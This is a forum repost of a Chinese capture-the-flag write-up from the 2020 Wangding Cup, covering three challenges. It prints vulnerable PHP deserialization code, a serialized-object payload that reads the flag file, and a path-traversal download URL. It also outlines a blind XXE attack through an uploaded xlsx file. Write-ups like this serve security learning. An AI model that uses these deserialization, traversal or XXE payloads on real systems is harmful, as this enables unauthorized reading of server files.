• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

2020“网鼎杯”青龙组部分题目WriteUp


JieGe

Recommended Posts

  • Members

PY交易太多 而且 下午下发Web 时间实属不够 居然还一对一Docker容器

非常卑微的Web狗

AreUSerialz ( 100pt )

考点:反序列化

打开容器 给了源码


 
 
<?php
 
include("flag.php");
 
highlight_file(__FILE__);
 
class FileHandler {
 
protected $op;
 
protected $filename;
 
protected $content;
 
function __construct() {
 
$op = "1";
 
$filename = "/tmp/tmpfile";
 
$content = "Hello World!";
 
$this->process();
 
}
 
public function process() {
 
if($this->op == "1") {
 
$this->write();
 
} else if($this->op == "2") {
 
$res = $this->read();
 
$this->output($res);
 
} else {
 
$this->output("Bad Hacker!");
 
}
 
}
 
private function write() {
 
if(isset($this->filename) && isset($this->content)) {
 
if(strlen((string)$this->content) > 100) {
 
$this->output("Too long!");
 
die();
 
}
 
$res = file_put_contents($this->filename, $this->content);
 
if($res) $this->output("Successful!");
 
else $this->output("Failed!");
 
} else {
 
$this->output("Failed!");
 
}
 
}
 
private function read() {
 
$res = "";
 
if(isset($this->filename)) {
 
$res = file_get_contents($this->filename);
 
}
 
return $res;
 
}
 
private function output($s) {
 
echo "[Result]: <br>";
 
echo $s;
 
}
 
function __destruct() {
 
if($this->op === "2")
 
$this->op = "1";
 
$this->content = "";
 
$this->process();
 
}
 
}
 
function is_valid($s) {
 
for($i = 0; $i < strlen($s); $i++)
 
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
 
return false;
 
return true;
 
}
 
if(isset($_GET{'str'})) {
 
$str = (string)$_GET['str'];
 
if(is_valid($str)) {
 
$obj = unserialize($str);
 
}
 
}

 
 
 
 
 
 

代码审计后 很明显是要用文件读取来读取flag值

需要绕过is_valid()函数 ,因为 protected 类型的属性的序列化字符串包含不可见字符\00

而且 php7.1+ 版本对属性类型并不敏感,所以本地序列化就直接用public就可以


 
 
 
 
Payload:
 
<?php
 
class FileHandler {
 
 
 
public $op = 2;
 
public $filename = "/proc/self/cmdline";
 
public $content = "ti0s";
 
}
 
 
 
function is_valid($s) {
 
for($i = 0; $i < strlen($s); $i++)
 
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
 
return false;
 
return true;
 
}
 
 
 
$a = new FileHandler();
 
$b = serialize($a);
 
echo $b."\n";
 
var_dump(is_valid($b));

 
 
 
 
 
 

发现Web路径为 /web/html


 
 
直接梭哈读取
 
 
 
/?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/web/html/flag.php";s:7:"content";s:4:"ti0s";}

 
 
 
 
 
 

filejava ( 46pt )

考点: 目录穿越 、任意文件下载、Java反编译、盲XXE

下载页面处存在路径穿越,可以读到web.xml:


 
 
http://url/file_in_java/DownloadServlet?filename=../../../../WEB-INF/web.xml

 
 
 
 
 
 
2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

下载class文件

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

不要问我为什么不直接 下载/flag文件

因为DownloadServlet.class这里过滤了flag不能直接下载

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog 2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

应该就是用xlsx让后构造xml文件读flag了

跟用docx里的xml进行xxe是一样的

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

然后上传 查看日志

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog 2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

boom(7PT)

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog 2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

上cmd5

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog 2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

得x=74, y=68, z=31

2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

解一元二次方程脚本


 
 
import math
 
print("ax*x+bx+c=0")
 
a=float(input("输入a:"))
 
b=float(input("输入b:"))
 
c=float(input("输入c:"))
 
p=b*b-4*a*c
 
if p<0:
 
print("无")
 
exit()
 
else:
 
x1 = (-b+math.sqrt(p))/(2*a)
 
x2 = (-b-math.sqrt(p))/(2*a)
 
print("第一个解: "+str(x1),"第二个解: "+str(x2))

 
 
 
 
 
 
2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog 2020“网鼎杯”青龙组部分题目WriteUp-Ti0s's Blog

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now